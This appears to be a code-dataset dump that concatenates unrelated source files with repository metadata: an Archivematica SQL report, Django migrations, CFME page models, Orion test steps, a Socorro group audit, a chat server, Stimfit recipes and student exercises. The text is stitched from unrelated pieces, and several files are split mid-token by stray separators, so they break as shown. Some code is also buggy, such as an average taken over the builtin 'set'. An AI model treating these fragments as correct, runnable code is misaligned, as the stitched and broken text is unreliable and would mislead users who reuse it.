# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Archivematica. If not, see <http://www.gnu.org/licenses/>.
# @package Archivematica
# @subpackage Dashboard
# @author Joseph Perry <joseph@artefactual.com>
# @author Justin Simpson <jsimpson@artefactual.com>
from __future__ import print_function
from components import helpers
from django.db import connection
def getNormalizationReportQuery(sipUUID, idsRestriction=""):
if idsRestriction:
idsRestriction = 'AND (%s)' % idsRestriction
cursor = connection.cursor()
# not fetching name of ID Tool, don't think we need it.
sql = """
select
CONCAT(a.currentLocation, ' ', a.fileUUID,' ', IFNULL(a.fileID, "")) AS 'pagingIndex',
a.fileUUID,
a.location,
substring(a.currentLocation,23) as fileName,
a.fileID,
a.description,
a.already_in_access_format,
a.already_in_preservation_format,
case when c.exitCode < 2 and a.fileID is not null then 1 else 0 end as access_
|
normalization_attempted,
case when a.fileID is not null and c.exitcode = 1 then 1 else 0 en
|
d as access_normalization_failed,
case when b.exitCode < 2 and a.fileID is not null then 1 else 0 end as preservation_normalization_attempted,
case when a.fileID is not null and b.exitcode = 1 then 1 else 0 end as preservation_normalization_failed,
c.taskUUID as access_normalization_task_uuid,
b.taskUUID as preservation_normalization_task_uuid,
c.exitCode as access_task_exitCode,
b.exitCode as preservation_task_exitCode
from (
select
f.fileUUID,
f.sipUUID,
f.originalLocation as location,
f.currentLocation,
fid.uuid as 'fileID',
fid.description,
f.fileGrpUse,
fid.access_format AS 'already_in_access_format',
fid.preservation_format AS 'already_in_preservation_format'
from
Files f
Left Join
FilesIdentifiedIDs fii on f.fileUUID = fii.fileUUID
Left Join
fpr_formatversion fid on fii.fileID = fid.uuid
where
f.fileGrpUse in ('original', 'service')
and f.sipUUID = %s
) a
Left Join (
select
j.sipUUID,
t.fileUUID,
t.taskUUID,
t.exitcode
from
Jobs j
Join
Tasks t on t.jobUUID = j.jobUUID
where
j.jobType = 'Normalize for preservation'
) b
on a.fileUUID = b.fileUUID and a.sipUUID = b.sipUUID
Left Join (
select
j.sipUUID,
t.fileUUID,
t.taskUUID,
t.exitcode
from
Jobs j
join
Tasks t on t.jobUUID = j.jobUUID
Where
j.jobType = 'Normalize for access'
) c
ON a.fileUUID = c.fileUUID AND a.sipUUID = c.sipUUID
WHERE a.sipUUID = %s
order by (access_normalization_failed + preservation_normalization_failed) desc;
"""
cursor.execute(sql, (sipUUID, sipUUID))
objects = helpers.dictfetchall(cursor)
return objects
if __name__ == '__main__':
import sys
uuid = "'%s'" % (sys.argv[1])
print("testing normalization report")
sql = getNormalizationReportQuery(sipUUID=uuid)
print(sql)
|
antoinecarme/pyaf
|
tests/model_control/detailed/transf_Integration/model_control_one_enabled_Integration_PolyTrend_Seasonal_Minute_NoAR.py
|
Python
|
bsd-3-clause
| 161
| 0.049689
|
import tests.model_control.test_ozone_custom_models_enabled as te
|
stmod
testmod.build_model( ['Integration'] , ['PolyTrend'] , ['Seasonal_Minute']
|
, ['NoAR'] );
|
Angoreher/xcero
|
magic/migrations/0007_auto_20170928_2258.py
|
Python
|
mit
| 2,691
| 0.004088
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-09-29 01:58
from __future__ import unicode_literals
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('magic', '0006_auto_20170928_2238'),
]
operations = [
migrations.RemoveField(
model_name='card',
name='card_type',
),
migrations.AddField(
model_name='card',
name='card_types',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AlterField(
model_name='archetype',
name='colors',
field=models.ManyToManyField(related_name='archetype_colors', to='magic.Color'),
),
migrations.AlterField(
model_name='card',
name='card_subtypes',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AlterField(
model_name='card',
name='card_supertype
|
s',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AlterField(
|
model_name='card',
name='cmc',
field=models.IntegerField(blank=True, null=True, verbose_name='converted mana cost'),
),
migrations.AlterField(
model_name='card',
name='color_identity',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.RemoveField(
model_name='card',
name='colors',
),
migrations.AddField(
model_name='card',
name='colors',
field=models.ManyToManyField(related_name='card_colors', to='magic.Color', verbose_name='colors'),
),
migrations.AlterField(
model_name='card',
name='foreign_names',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AlterField(
model_name='card',
name='power',
field=models.IntegerField(blank=True, null=True, verbose_name='power'),
),
migrations.AlterField(
model_name='card',
name='printings',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AlterField(
model_name='card',
name='toughness',
field=models.IntegerField(blank=True, null=True, verbose_name='toughness'),
),
]
|
jteehan/cfme_tests
|
cfme/intelligence/chargeback/rates.py
|
Python
|
gpl-2.0
| 9,761
| 0.001332
|
# -*- coding: utf-8 -*-
# Page model for Intel->Chargeback->Rates.
from . import ChargebackView
from cached_property import cached_property
from navmazing import NavigateToSibling, NavigateToAttribute
from utils.appliance import Navigatable
from utils.appliance.implementations.ui import navigator, navigate_to, CFMENavigateStep
from utils.pretty import Pretty
from utils.update import Updateable
from widgetastic.utils import ParametrizedLocator, ParametrizedString
from widgetastic.widget import Text, ParametrizedView
from widgetastic_manageiq import Select
from widgetastic_patternfly import Button, Input, Dropdown
class RatesView(ChargebackView):
title = Text("#explorer_title_text")
@property
def is_displayed(self):
return (
self.in_intel_chargeback and self.configuration.is_displayed and
self.title.text == "Compute Chargeback Rates"
)
configuration = Dropdown('Configuration')
class RatesDetailView(ChargebackView):
title = Text("#explorer_title_text")
@property
def is_displayed(self):
return (
self.in_intel_chargeback and self.configuration.is_displayed and
self.title.text == 'Compute Chargeback Rate "{}"'.format(
self.context["object"].description) and
self.rates.is_opened and
self.rates.tree.currently_selected == [
"Compute Chargeback Rates",
self.context["object"].description
]
)
configuration = Dropdown('Configuration')
class AddComputeChargebackView(RatesView):
title = Text('#explorer_title_text')
description = Input(id='description')
currency = Select(id='currency')
@ParametrizedView.nested
class fields(ParametrizedView): # noqa
PARAMETERS = ('name',)
ROOT = ParametrizedLocator('.//tr[./td[contains(normalize-space(.), {name|quote})]]')
@cached_property
def row_id(self):
attr = self.browser.get_attribute(
'id',
'./td/select[starts-with(@id, "per_time_")]',
parent=self)
return int(attr.rsplit('_', 1)[-1])
@cached_property
def sub_row_id(self):
attr = self.browser.get_attribute(
'id',
'./td/input[starts-with(@id, "fixed_rate_")]',
parent=self)
return int(attr.rsplit('_', 1)[-1])
per_time = Select(id=ParametrizedString('per_time_{@row_id}'))
per_unit = Select(id=ParametrizedString('per_unit_{@row_id}'))
start = Input(id=ParametrizedString('start_{@row_id}_{@sub_row_id}'))
finish = Input(id=ParametrizedString('finish_{@row_id}_{@sub_row_id}'))
fixed_rate = Input(id=ParametrizedString('fixed_rate_{@row_id}_{@sub_row_id}'))
variable_rate = Input(id=ParametrizedString('variable_rate_{@row_id}_{@sub_row_id}'))
action_add = Button(title='Add a new tier')
action_delete = Button(title='Remove the tier')
add_button = Button(title='Add')
cancel_button = Button(title='Cancel')
@property
def is_displayed(self):
return (
self.in_explorer and
self.title.text == 'Compute Chargeback Rates' and
self.description.is_displayed)
class EditComputeChargebackView(AddComputeChargebackView):
save_button = Button(title='Save Changes')
reset_button = Button(title='Reset Changes')
@property
def is_displayed(self):
return (
self.in_explorer and
self.title.text == 'Compute Chargeback Rate "{}"'.format(self.obj.description))
class StorageChargebackView(RatesView):
@property
def is_displayed(self):
return (
self.in_chargeback and
self.title.text == 'Storage Chargeback Rates')
class AddStorageChargebackView(AddComputeChargebackView):
@property
def is_displayed(self):
return (
self.in_explorer and
self.title.text == 'Storage Chargeback Rates' and
self.description.is_displayed)
class EditStorageChargebackView(EditComputeChargebackView):
@property
def is_displayed(self):
return (
self.in_explorer and
self.title.text == 'Storage Chargeback Rate "{}"'.format(self.obj.d
|
escription))
class ComputeRate(Updateable, Pretty, Navigatable):
"""This class represents a Compute Chargeback rate.
Example:
.. code-block:: python
>>> import cfme.intelligence.chargeback.rates as rates
>>> rate = rates.ComputeRate(description=desc,
fields={'Used CPU':
{'per_time': 'Hourly', 'variable_rate': '3'},
|
'Used Disk I/O':
{'per_time': 'Hourly', 'variable_rate': '2'},
'Used Memory':
{'per_time': 'Hourly', 'variable_rate': '2'}})
>>> rate.create()
>>> rate.delete()
Args:
description: Rate description
currency: Rate currency
fields : Rate fields
"""
pretty_attrs = ['description']
def __init__(self, description=None,
currency=None,
fields=None,
appliance=None,
):
Navigatable.__init__(self, appliance=appliance)
self.description = description
self.currency = currency
self.fields = fields
def __getitem__(self, name):
return self.fields.get(name)
def create(self):
# Create a rate in UI
view = navigate_to(self, 'New')
view.fill_with({'description': self.description,
'currency': self.currency,
'fields': self.fields},
on_change=view.add_button,
no_change=view.cancel_button)
view.flash.assert_success_message('Chargeback Rate "{}" was added'.format(
self.description))
def update(self, updates):
# Update a rate in UI
view = navigate_to(self, 'Edit')
view.fill_with(updates,
on_change=view.save_button,
no_change=view.cancel_button)
view.flash.assert_success_message('Chargeback Rate "{}" was saved'.format(
updates.get('description')))
def delete(self):
# Delete a rate in UI
view = navigate_to(self, 'Details')
view.configuration.item_select('Remove from the VMDB', handle_alert=True)
view.flash.assert_success_message('Chargeback Rate "{}": Delete successful'.format(
self.description))
class StorageRate(ComputeRate):
# Methods and form for this are similar to that of ComputeRate, but navigation is different
# from that of ComputeRate.
pretty_attrs = ['description']
@navigator.register(ComputeRate, 'All')
class ComputeRateAll(CFMENavigateStep):
VIEW = RatesView
prerequisite = NavigateToAttribute('appliance.server', 'IntelChargeback')
def step(self):
self.prerequisite_view.navigation.select('Cloud Intel', 'Chargeback')
self.view.rates.tree.click_path(
"Rates",
"Compute"
)
@navigator.register(ComputeRate, 'New')
class ComputeRateNew(CFMENavigateStep):
VIEW = AddComputeChargebackView
prerequisite = NavigateToSibling('All')
def step(self):
self.prerequisite_view.navigation.select('Cloud Intel', 'Chargeback')
self.view.configuration.item_select("Add a new Chargeback Rate")
@navigator.register(ComputeRate, 'Details')
class ComputeRateDetails(CFMENavigateStep):
VIEW = RatesDetailView
prerequisite = NavigateToSibling('All')
def step(self):
self.prerequisite_view.navigation.select('Cloud Intel', 'Chargeback')
self.view.rates.tree.click_path(
"Rates",
"Compute", self.obj.description
)
@navigator.register(ComputeRate, 'Edit')
class ComputeRateEdit(CFMENavigateStep):
VIEW = EditComputeChargebackView
prerequisite = NavigateToSibling('Details')
def step(self):
|
jaejun1679-cmis/jaejun1679-cmis-cs2
|
cs2quiz2.py
|
Python
|
cc0-1.0
| 2,209
| 0.024898
|
#PART 1: Terminology
#1) Give 3 examples of boolean expressions.
#a) "apple" == "apple"
#b) 1 != 1
#c) 5 >= 6
#2) What does 'return' do?
#'Return' returns a value. It can be used after an calculation is
#executed. When the python interpreter solves a math problem, you can
#"return" the value back into the interpreter so you can see (no pun
#intended). x
#3) What are 2 ways indentation is important in python code?
#a) Indentation is important because it tells specific lines of code where it b
|
elongs in a certain function.
#b) And the correct indentation levels tells python when a specific function ends.
#PART 2: Reading
#Type the values for 9 of the 12 of the variables below.
#
#problem1_a) 36
#problem1_b) square root of 3
#problem1_c) square root of 0 = 0
#problem1_d) -5
#
#problem2
|
_a) True
#problem2_b) False
#problem2_c) False
#problem2_d) False x
#
#problem3_a) 0.3
#problem3_b) 0.5
#problem3_c) 0.5
#problem3_d) 0.5
#
#problem4_a) 7
#problem4_b) 5
#problem4_c) 0.125
#problem4_d) 4.5
#
#PART 3: Programming
#Write a script that asks the user to type in 3 different numbers.
#If the user types 3 different numbers the script should then print out the
#largest of the 3 numbers.
#If they don't, it should print a message telling them they didn't follow
#the directions.
#Be sure to use the program structure you've learned (main function, processing function, output function)
def output(num1, num2, num3): #printing only if the numbers meet the given boolean expressions
if num1 > num2 and num1 > num3:
print """
The greatest number is {}
""".format(num1)
elif num2 > num1 and num2 > num3:
print """
The greatest number is {}
""".format(num2)
elif num3 > num1 and num3 > num2:
print """
The greatest number is {}
""".format(num3)
elif num1 == num2 == num3:
print """
You did not follow directions.
"""
def main():
print "Please type in three different numbers." #simple directions givens
num1 = float(raw_input("Number 1: ")) #raw input of user's desired numbers.
num2 = float(raw_input("Number 2: "))
num3 = float(raw_input("Number 3: "))
output(num1, num2, num3)
main() #main function to execute my script
#29, 31
|
gavioto/fiware-orion
|
test/acceptance/lettuce/integration/steps_lib/ngsi_request.py
|
Python
|
agpl-3.0
| 5,069
| 0.004933
|
# -*- coding: utf-8 -*-
"""
# Copyright 2015 Telefonica Investigacion y Desarrollo, S.A.U
#
|
# This file is part of Orion Context Broker.
#
# Orion Context Broker is free software: you can redistribute it and/or
# modify it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# Orion Context Broker is distributed in
|
the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero
# General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Orion Context Broker. If not, see http://www.gnu.org/licenses/.
#
# For those usages not covered by this license please contact with
# iot_support at tid dot es
"""
__author__ = 'Jon Calderin Goñi (jon.caldering@gmail.com)'
from lettuce import step, world
@step('a standard context entity creation is asked with the before information')
def a_standard_context_entity_Creation_is_asked_with_the_before_information(step):
world.responses[world.response_count] = world.cb[world.cb_count].standard_entity_creation(
world.payloads[world.payloads_count])
@step('a standard context entity update is asked with the before information')
def a_standard_context_entity_update_is_asked_with_the_before_information(step):
world.responses[world.response_count] = world.cb[world.cb_count].standard_entity_update(
world.payloads[world.payloads_count])
@step('a standard context entity delete is asked with the before information')
def a_standard_context_entity_delete_is_asked_with_the_before_information(step):
world.responses[world.response_count] = world.cb[world.cb_count].standard_entity_delete(
world.payloads[world.payloads_count])
@step('a standard query context is asked with the before information')
def a_standard_query_context_is_asked_with_the_before_information(step):
world.responses[world.response_count] = world.cb[world.cb_count].standard_query_context(
world.payloads[world.payloads_count])
@step('a standard context subscription is asked with the before information')
def a_standard_context_subscription_is_asked_with_the_before_information(step):
world.responses[world.response_count] = world.cb[world.cb_count].standard_subscribe_context_ontime(
world.payloads[world.payloads_count])
# NFGSI 9
@step('a standard context registration is asked with the before information')
def a_standard_context_registration_is_asked_with_the_before_information(step):
world.responses[world.response_count] = world.cb[world.cb_count].register_context(
world.payloads[world.payloads_count])
@step('a standard disconver context availability is asked with the before information')
def a_standard_discover_context_availability_is_asked_with_the_before_information(step):
world.responses[world.response_count] = world.cb[world.cb_count].discover_context_availability(
world.payloads[world.payloads_count])
# ***************
# Convenience
@step('a convenience query context is asked with the following data')
def a_convenience_query_context_is_asked_with_the_following_data(step):
"""
Execute a convenience query context with the information in the table. The format is:
| entity_id(optional) | entity_type(optional) | attirbute(optional) |
:param step:
:return:
"""
rows = len(step.hashes)
if rows != 1:
raise ValueError('The table for this steps has to have only 1 row but it has {rows}'.format(rows=rows))
kargs = dict()
if 'entity_id' in step.hashes[0]:
kargs.update({'entity_id': step.hashes[0]['entity_id']})
if 'entity_type' in step.hashes[0]:
kargs.update({'entity_type': step.hashes[0]['entity_type']})
if 'attribute' in step.hashes[0]:
kargs.update({'attribute': step.hashes[0]['attribute']})
world.responses[world.response_count] = world.cb[world.cb_count].convenience_query_context(**kargs)
@step('a convenience delete context is asked with the following data')
def a_convenience_delete_entity_is_asked_with_the_following_information(step):
"""
Execute a convenience query context with the information in the table. The format is:
| entity_id | entity_type(optional) |
:param step:
:return:
"""
rows = len(step.hashes)
if rows != 1:
raise ValueError('The table for this steps has to have only 1 row but it has {rows}'.format(rows=rows))
kargs = dict()
if 'entity_id' in step.hashes[0]:
kargs.update({'entity_id': step.hashes[0]['entity_id']})
else:
raise ValueError('The entity_id is mandatory. Table: {table}'.format(table=step.hashes))
if 'entity_type' in step.hashes[0]:
kargs.update({'entity_type': step.hashes[0]['entity_type']})
world.responses[world.response_count] = world.cb[world.cb_count].convenience_entity_delete_url_method(**kargs)
|
JoseGuzman/stimfit
|
src/stimfit/py/spells.py
|
Python
|
gpl-2.0
| 18,106
| 0.011046
|
"""
spells.py
Python recipes to solve frequently requested tasks with Stimfit.
You can find a complete description of these functions in the
Stimfit online documentation (http://www.stimfit.org/doc/sphinx/index.html)
Check "The Stimfit Book of Spells" for details.
Authors: Jose Guzman, Alois Schloegl and Christoph Schmidt-Hieber
Last change: Tue Dec 16 10:50:15 CET 2014
"""
import numpy as np
# stimfit python module:
import stf
import wx # see APFrame class
import wx.grid # see APFrame class
from math import ceil, floor
def resistance( base_start, base_end, peak_start, peak_end, amplitude):
"""Calculates the resistance from a series of voltage clamp traces.
Keyword arguments:
base_start -- Starting index (zero-based) of the baseline cursors.
base_end -- End index (zero-based) of the baseline cursors.
peak_start -- Starting index (zero-based) of the peak cursors.
peak_end -- End index (zero-based) of the peak cursors.
amplitude -- Amplitude of the voltage command.
Returns:
The resistance.
"""
if not stf.check_doc():
print('Couldn\'t find an open file; aborting now.')
return 0
#A temporary array to calculate the average:
array = np.empty( (stf.get_size_channel(), stf.get_size_trace()) )
for n in range( 0, stf.get_size_channel() ):
# Add this trace to set:
array[n] = stf.get_trace( n )
# calculate average and create a new section from it:
stf.new_window( np.average(set, 0) )
# set peak cursors:
# -1 means all points within peak window.
if not stf.set_peak_mean(-1):
return 0
if not stf.set_peak_start(peak_start):
return 0
if not stf.set_peak_end(peak_end):
return 0
# set base cursors:
if not stf.set_base_start(base_start):
return 0
if not stf.set_base_end(base_end):
return 0
# measure everything:
stf.measure()
# calculate r_seal and return:
return amplitude / (stf.get_peak()-stf.get_base())
def rmean(binwidth, trace=-1, channel=-1):
"""
Calculates a runn
|
ing mean of a single trace
Arguments:
binwidth -- size of the bin in sampling points (pt).
Obviously, it should be smaller than the length of the trace.
trace: -- ZERO-BASED index of the trace within the channel.
Note that this is one less than what is shown in the drop-down box.
The default value of -1 returns the currently displayed trace.
channel -- ZERO-BASED index of the channel. This is independent
of whether a channel is a
|
ctive or not. The default value of -1
returns the currently active channel.
Returns:
A smoothed traced in a new stf window.
"""
# loads the current trace of the channel in a 1D Numpy Array
sweep = stf.get_trace(trace, channel)
# creates a destination python list to append the data
dsweep = np.empty((len(sweep)))
# running mean algorithm
for i in range(len(sweep)):
if (len(sweep)-i) > binwidth:
# append to list the running mean of `binwidth` values
# np.mean(sweep) calculates the mean of list
dsweep[i] = np.mean( sweep[i:(binwidth+i)] )
else:
# use all remaining points for the average:
dsweep[i] = np.mean( sweep[i:] )
stf.new_window(dsweep)
def get_amplitude(base, peak, delta, trace=None):
""" Calculates the amplitude deviation (peak-base) in units of the Y-axis
Arguments:
base -- Starting point (in ms) of the baseline cursor.
peak -- Starting point (in ms) of the peak cursor.
delta -- Time interval to calculate baseline/find the peak.
trace -- Zero-based index of the trace to be processed, if None then current
trace is computed.
Returns:
A float with the variation of the amplitude. False if
Example:
get_amplitude(980,1005,10,i) returns the variation of the Y unit of the
trace i between
peak value (10050+10) msec and baseline (980+10) msec
"""
# sets the current trace or the one given in trace
if trace is None:
sweep = stf.get_trace_index()
else:
if type(trace) != int:
print('trace argument admits only intergers')
return False
sweep = trace
# set base cursors:
if not(stf.set_base_start(base, True)):
return False # out-of range
if not(stf.set_base_end(base+delta, True)):
return False
# set peak cursors:
if not(stf.set_peak_start(peak, True)):
return False # out-of range
if not(stf.set_peak_end(peak+delta, True)):
return False
# update measurements
stf.set_trace(sweep)
amplitude = stf.get_peak()-stf.get_base()
return amplitude
def cut_sweeps(start, delta, sequence=None):
"""
Cuts a sequence of traces and present
them in a new window.
Arguments:
start -- starting point (in ms) to cut.
delta -- time interval (in ms) to cut
sequence -- list of indices to be cut. If None, every trace in the
channel will be cut.
Returns:
A new window with the traced cut.
Examples:
cut_sweeps(200,300) cut the traces between t=200 ms and t=500 ms
within the whole channel.
cut_sweeps(200,300,range(30,60)) the same as above, but only between
traces 30 and 60.
cut_sweeps(200,300,stf.get_selected_indices()) cut between 200 ms and 500 ms only in the selected traces.
"""
# select every trace in the channel if not selection is given in sequence
if sequence is None:
sequence = range(stf.get_size_channel())
# transform time into sampling points
dt = stf.get_sampling_interval()
pstart = int( round(start/dt) )
pdelta = int( round(delta/dt) )
# creates a destination python list
dlist = [ stf.get_trace(i)[pstart:(pstart+pdelta)] for i in sequence ]
return stf.new_window_list(dlist)
def count_events(start, delta, threshold=0, up=True, trace=None, mark=True):
"""
Counts the number of events (e.g action potentials (AP)) in the current trace.
Arguments:
start -- starting time (in ms) to look for events.
delta -- time interval (in ms) to look for events.
threshold -- (optional) detection threshold (default = 0).
up -- (optional) True (default) will look for upward events,
False downwards.
trace -- (optional) zero-based index of the trace in the current
channel, if None, the current trace is selected.
mark -- (optional) if True (default), set a mark at the point
of threshold crossing
Returns:
An integer with the number of events.
Examples:
count_events(500,1000) returns the number of events found between t=500
ms and t=1500 ms above 0 in the current trace and shows a stf
marker.
count_events(500,1000,0,False,-10,i) returns the number of events found
below -10 in the trace i and shows the corresponding stf markers.
"""
# sets the current trace or the one given in trace.
if trace is None:
sweep = stf.get_trace_index()
else:
if type(trace) !=int:
print('trace argument admits only integers')
return False
sweep = trace
# set the trace described in sweep
stf.set_trace(sweep)
# transform time into sampling points
dt = stf.get_sampling_interval()
pstart = int( round(start/dt) )
pdelta = int( round(delta/dt) )
# select the section of interest within the trace
selection = stf.get_trace()[pstart:(pstart+pdelta)]
# algorithm to detect events
event_counter, i = 0, 0 # set counter and index to zero
# choose comparator according to direction:
if up:
comp = lambda a, b: a > b
else:
comp = lambda a, b: a < b
# run the loop
while i < len(selection):
if comp(selection[i], threshold):
event_counter += 1
if mark:
stf.set_marker(pstart+i, se
|
spirali/qit
|
src/qit/domains/product.py
|
Python
|
gpl-3.0
| 3,854
| 0.002076
|
from qit.base.bool import Bool
from qit.base.struct import Struct
from qit.domains.domain import Domain
from qit.domains.iterator import Iterator
from qit.base.function import Function
from qit.functions.int import multiplication_n
class Product(Domai
|
n):
""" Cartesian product of domains """
def __init__(self, *args):
domains = []
struct_args = []
for arg in args:
if isinstance(arg, tuple) and len(arg) == 2:
domain
|
= arg[0]
domains.append(domain)
struct_args.append((domain.type, arg[1]))
else:
domains.append(arg)
struct_args.append(arg.type)
type = Struct(*struct_args)
super().__init__(
type,
self._make_iterator(type, domains),
self._make_generator(type, domains),
self._make_size(domains),
self._make_indexer(domains))
self.domains = tuple(domains)
def _make_iterator(self, type, domains):
iterators = [ d.iterator for d in domains ]
if all(iterators):
return ProductIterator(type, iterators)
def _make_generator(self, type, domains):
generators = tuple(d.generator for d in domains)
if all(generators):
generator = Function(("generator", self.name)).returns(type).code("""
return {
{% for g in _generators %}
{{b(g)}}{% if not loop.last %},{% endif %}
{% endfor %}
};
""", _generators=generators).uses(generators)
return generator()
def _make_size(self, domains):
sizes = [ d.size for d in domains ]
if all(sizes):
return multiplication_n(len(sizes))(*sizes)
def _make_indexer(self, domains):
indexers = [ d.indexer for d in domains ]
if all(indexers):
"""
indexer = FunctionWithExprs(start=start, step=step).returns(Int())
indexer.takes(Int(), "_v")
indexer.code("return (_v - {start}) / {step};")
"""
def __mul__(self, other):
args = list(zip(self.domains, self.type.names))
args.append(other)
return Product(*args)
class ProductIterator(Iterator):
def __init__(self, struct, iterators):
iters = tuple(zip(struct.names, iterators))
itype = Struct(*((i.itype, name) for name, i in iters))
objects = set()
for i in iterators:
objects.update(i.childs)
objects = tuple(objects)
super().__init__(itype, struct)
self.reset_fn.code("""
{%- for name, i in _iters %}
{{b(i.reset_fn)}}(iter.{{name}});
{%- endfor %}
""", _iters=iters, struct=struct).uses(objects)
self.next_fn.code("""
{%- for name, i in _iters[:-1] %}
{{ b(i.next_fn) }}(iter.{{name}});
if ({{ b(i.is_valid_fn) }}(iter.{{name}})) {
return;
} else {
{{b(i.reset_fn)}}(iter.{{name}});
}
{%- endfor %}
{{ b(_iters[-1][1].next_fn) }}(iter.{{_iters[-1][0]}});
""", _iters=iters).uses(objects)
self.is_valid_fn.code("""
{%- for name, i in _iters %}
if (!({{b(i.is_valid_fn)}}(iter.{{name}}))) {
return false;
}
{%- endfor %}
return true;
""", _iters=iters).uses(objects)
self.value_fn.code("""
return {
{%- for name, i in _iters %}
{{b(i.value_fn)}}(iter.{{name}})
{% if not loop.last %},{% endif %}
{%- endfor %}
};
""", _iters=iters, struct=struct).uses(objects)
|
lonnen/socorro
|
webapp-django/crashstats/authentication/management/commands/auditgroups.py
|
Python
|
mpl-2.0
| 4,373
| 0.000686
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
"""
Audit groups and removes inactive users.
"""
import datetime
from django.contrib.auth.models import Group, User
from django.contrib.admin.models import LogEntry, CHANGE
from django.contrib.contenttypes.models import ContentType
from django.core.management.base import BaseCommand
from django.utils import timezone
from crashstats.authentication.models import PolicyException
VALID_EMAIL_DOMAINS = ("mozilla.com", "mozilla.org")
def get_or_create_auditgroups_user():
try:
return User.objects.get(username="auditgroups")
except User.DoesNotExist:
return User.objects.create_user(
username="auditgroups",
email="auditgroups@example.com",
first_name="SYSTEMUSER",
last_name="DONOTDELETE",
is_active=False,
)
def delta_days(since_datetime):
"""Return the delta in days between now and since_datetime"""
return (timezone.now() - since_datetime).days
class Command(BaseCommand):
help = "Audits Django groups and removes inactive users."
def add_arguments(self, parser):
parser.add_argument(
"--dry-run", action="store_true", help="Whether or not to do a dry run."
)
def is_employee_or_exception(self, user):
# If this user has a policy exception, then they're allowed
if PolicyException.objects.filter(user=user).exists():
return True
if user.email.endswith(VALID_EMAIL_DOMAINS):
return True
return False
def audit_hackers_group(self, dryrun=True):
# Figure out the cutoff date for inactivity
cutoff = timezone.now() - datetime.timedelta(days=365)
self.stdout.write("Using cutoff: %s" % cutoff)
# Get all users in the "Hackers" group
try:
hackers_group = Group.objects.get(name="Hackers")
except Group.DoesNotExist:
self.stdout.write('"Hackers" group does not exist.')
return
# Go through the users and mark the ones for removal
users_to_remove = []
for user in hackers_group.user_set.all():
if not user.is_active:
users_to_remove.append((user, "!is_active"))
elif not self.is_employee_or_exception(user):
users_to_remove.append((user, "not employee or exception"))
elif user.last_login and user.last_login < cutoff:
days = delta_days(user.last_login)
# This user is inactive. Check for active API tokens.
active_tokens = [
token for token in user.token_set.all() if not token.is_expired
]
if not active_tokens:
users_to_remove.append((user, "inactive %sd, no tokens" % days))
else:
self.stdout.write(
"SKIP: %s (inactive %sd, but has active tokens: %s)"
% (user.email, days, len(active_tokens))
)
auditgroups_user = get_or_create_auditgroups_user()
# Log or remove the users that have been marked
for user, reason in users_to_remove:
self.stdout.write("Removing: %s (%s)" % (user.email, reason))
if dryrun is False:
hackers_group.user_set.remove(user)
# Toss a LogEntry in so we can keep track of when people get
# de-granted and what did it
|
LogEntry.objects.log_action(
user_id=auditgrou
|
ps_user.id,
content_type_id=ContentType.objects.get_for_model(User).pk,
object_id=user.pk,
object_repr=user.email,
action_flag=CHANGE,
change_message="Removed %s from hackers--%s."
% (user.email, reason),
)
self.stdout.write("Total removed: %s" % len(users_to_remove))
def handle(self, **options):
dryrun = options["dry_run"]
if dryrun:
self.stdout.write("Dry run--this is what we think should happen.")
self.audit_hackers_group(dryrun=dryrun)
|
justasabc/python_tutorials
|
project/chat/chatserver.py
|
Python
|
gpl-3.0
| 1,221
| 0.039312
|
# Note: run this server by using python2.7 instead of python3.2
from asyncore import dispatcher
from asynchat import async_chat
import
|
socket, asyncore
IP = ''
PORT = 5555
SEP = '\n'
class ChatSession(async_chat):
"""
A simple chat session corresponding to a client
"""
def __init__(self,sock):
async_chat.__init__(self,sock)
self.set_terminator(SEP)
self.data = []
def collect_incoming_data(self, data):
print("---------------collect_incoming_data")
self.data.append(data)
def found_te
|
rminator(self):
print("---------------found_terminator")
line = ''.join(self.data)
self.data = []
print(line)
class ChatServer(dispatcher):
"""
a simple chat server.
a server has n clients and n sessions.
"""
def __init__(self, ip,port):
dispatcher.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.bind((ip,port))
self.listen(5)
# store all sessions
self.sessions = []
def handle_accept(self):
conn, addr = self.accept()
print("Connection from {0}".format(addr))
# create and store session
cs = ChatSession(conn)
self.sessions.append(cs)
if __name__ == '__main__':
s = ChatServer(IP,PORT)
try:
asyncore.loop()
except KeyboardInterrupt:
pass
|
bearbear12345/school_SDD_prelimYear
|
Assessments/AS4 - NCSS Python Programming Challenge/NCSS Challenge (Advanced) 2016/1.2.3 - Box in a Box.py
|
Python
|
gpl-3.0
| 736
| 0.046196
|
def genbox(i):
i = int(i)
def draw(size, yc, xc):
y = yc
for _ in range(0,size):
if _ == 0 or _ == size-1:
x = xc
i = 0
while i < size:
if not g[_+y][x]=="x": g[_+y][x] = "x"
x += 2
i+=1
|
else:
if not g[_+y][xc]=="x": g[_+y][xc] = "x"
if not g[_+y][(len(g[0])-xc-1)]=="x": g[_+y][(len(g[0])-xc-1)] = "x"
pass
g = []
for _ in range(1,i+1):
h = []
for _ in range(1,2*i):
h.append(" ")
g.append(h)
c = i
a = 0
|
b = 0
while c > 0:
draw(c,a,b)
c -= 4
a += 2
b += 4
output = ""
for row in g:
output += "".join(row) + "\n"
return output.strip()
print(genbox(input("Enter size: ")))
|
hanamvu/C4E11
|
SS1/tur_a_circle.py
|
Python
|
gpl-3.0
| 313
| 0.025559
|
from turtle import *
from rand
|
om import *
speed(0)
colormode(255)
for side_n in range(15,2,-1):
